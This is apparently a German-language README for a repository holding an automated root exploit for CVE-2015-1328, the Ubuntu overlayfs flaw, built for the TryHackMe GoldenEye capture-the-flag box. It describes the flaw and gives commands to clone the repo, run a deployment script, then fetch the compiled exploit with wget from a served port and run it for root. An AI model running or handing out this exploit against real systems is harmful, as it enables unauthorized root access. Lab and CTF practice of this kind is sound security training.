
Automatisierter lokaler Privilege-Escalation-Exploit für CVE-2015-1328, der auf Ubuntu overlayfs abzielt, für CTF-Umgebungen mit einfachem Bash-Bereitstellungsskript entwickelt.
Die overlayfs-Implementierung im Paket linux (auch Linux-Kernel genannt) vor 3.19.0-21.21 in Ubuntu bis 15.04 prüft die Berechtigungen für die Dateierstellung im oberen Dateisystemverzeichnis nicht ordnungsgemäß, wodurch lokale Benutzer Root-Zugriff erlangen können, indem sie eine Konfiguration ausnutzen, in der overlayfs in einem beliebigen Mount-Namespace erlaubt ist.
Dank an rebel
Dies ist ein automatisierter Exploit für CVE-2015-1328 für die GoldenEye-CTF von TryHackMe. Da gcc auf dieser Maschine standardmäßig nicht verfügbar ist, habe ich gcc auf cc konfiguriert und den Exploit entsprechend ausgeführt, um Root-Rechte zu erlangen.
Installation
Klone einfach dieses Repository -
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit